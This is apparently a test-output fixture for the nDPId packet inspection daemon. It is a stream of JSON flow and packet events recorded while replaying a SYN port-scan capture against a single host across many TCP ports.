+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAs+zgAADYGFzqsEAAIQA2GNIzSAivdUoMYAAAAAGACDAAqZAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAs0mIAADUGQRCsEAAIQA2GNIzSA3DdUoMYAAAAAGACCAAtHwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsh+cAACgGmIusEAAIQA2GNIzSBtvdUoMYAAAAAGACBAAttAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsf0wAADkGkCasEAAIQA2GNIzSwAfdUoMYAAAAAGACCABwhwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsmKkAACcGiMmsEAAIQA2GNIzSID7dUoMYAAAAAGACEAAIUQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsn+QAACsGfY6sEAAIQA2GNIzSBELdUoMYAAAAAGACEAAkTQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAs98kAADAGIKmsEAAIQA2GNIzSDPzdUoMYAAAAAGACBAAnkwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsrp0AADMGZtWsEAAIQA2GNIzSB9DdUoMYAAAAAGACEAAgvwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAspjMAADMGbz+sEAAIQA2GNIzSw1PdUoMYAAAAAGACEABlOwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsGwkAADUG+GmsEAAIQA2GNIzSJT\/dUoMYAAAAAGACCAALUAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsHDkAADYG9jmsEAAIQA2GNIzSAKHdUoMYAAAAAGACDAAr7gAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsl+cAADIGfousEAAIQA2GNIzSIyjdUoMYAAAAAGACDAAJZwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAscOwAADQGo4asEAAIQA2GNIzSCDndUoMYAAAAAGACBAAsVgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAst4UAADMGXe2sEAAIQA2GNIzSBL3dUoMYAAAAAGACEAAj0gAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsFa0AACoGCMasEAAIQA2GNIzSSizdUoMYAAAAAGACDADiYgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsN6IAADgG2NCsEAAIQA2GNIzSApzdUoMYAAAAAGACBAAx8wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAssMQAACwGa66sEAAIQA2GNIzSACHdUoMYAAAAAGACBAA0bgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsLEAAADgG5DKsEAAIQA2GNIzSFuPdUoMYAAAAAGACBAAdrAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsl+oAACgGiIisEAAIQA2GNIzSgAndUoMYAAAAAGACBAC0hQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsHdEAADUG9aGsEAAIQA2GNIzS3aLdUoMYAAAAAGACCABS7AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsiq8AAC4Gj8OsEAAIQA2GNIzSI4vdUoMYAAAAAGACDAAJBAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAso2cAACwGeQusEAAIQA2GNIzSD83dUoMYAAAAAGACBAAkwgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsQAcAADQG1GusEAAIQA2GNIzSBEbdUoMYAAAAAGACBAAwSQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQwAACwG92asEAAIQA2GNIzSCBTdUoMYAAAAAGACBAAsewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EoAADgGLCisEAAIQA2GNIzSH5PdUoMYAAAAAGACBAAU\/AAAAgQFtA=="} 